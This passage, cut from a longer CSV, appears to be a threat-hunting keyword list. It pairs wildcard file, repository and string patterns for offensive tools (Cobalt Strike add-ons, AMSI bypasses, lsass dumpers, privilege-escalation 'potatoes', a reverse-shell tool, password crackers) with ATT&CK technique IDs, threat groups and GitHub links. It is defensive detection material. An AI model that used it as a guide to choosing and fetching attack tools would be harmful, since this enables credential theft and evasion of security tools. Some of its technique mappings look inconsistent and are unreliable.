T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*AlphabugX/csOnvps*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*AlphabugX/csOnvps*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*Already SYSTEM*not elevating*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*AlteredSecurity/365-Stealer*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*alwaysinstallelevated.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*alwaysinstallelevated.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*alwaysinstallelevated.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*am0nsec/HellsGate*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*amass enum -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*amass-get-rootdomains*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*amass-get-subdomains*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*amnoibeflfphhplmckdbiajkjaoomgnj*","greyware_tool_keyword","HideAll VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AMS1-Patch.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*AMSI patched in all powershells*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*AMSI_Bypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*AMSI_bypass_20*.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*AMSI_patch-main*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*Amsi-Bypass*","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1326","245","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" +"*amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*AmsiBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*Amsi-Killer.exe*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*Amsi-Killer.sln*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*Amsi-Killer.vcxproj*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*Amsi-Killer-master*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*AmsiOpenSession.cpp*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*AmsiOpenSession.sln*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*AmsiOpenSession.vcxproj*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*and Credential Guard will not be bypassed*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*andotp2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AndrewSpecial.cpp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*AndrewSpecial.exe*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*AndrewSpecial-master*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*androidbackup2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*androidfde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AnErrupTion/LoGiC.NET*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" +"*Anevicon*","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ANGRYPUPPY2.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*anonsurf.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*ansible2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*anthemtotheego/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*antirez/hping*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*AntivirusBypass.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*antiword FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*antonioCoco/ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*antonioCoco/JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*antonioCoco/RoguePotato*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*antonioCoco/SspiUacBypass*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*anydesk.exe --set-password*","greyware_tool_keyword","anydesk","setting the AnyDesk service password manually","N/A","N/A","N/A","N/A","RMM","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*anypotato.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*aojlhgbkmkahabcmcpifbolnoichfeep*","greyware_tool_keyword","VirtualShield VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AoratosWin*.zip*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.csproj*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.exe*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.exe*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.git*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin.sln*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*AoratosWin_*.zip*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*apache_felix_remote_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*APC_Ijnect_Load.nim*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*apcfdffemoinopelidncddjbhkiblecc*","greyware_tool_keyword","Soul VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*apex2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apfs_encrypted_volume_passwd.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 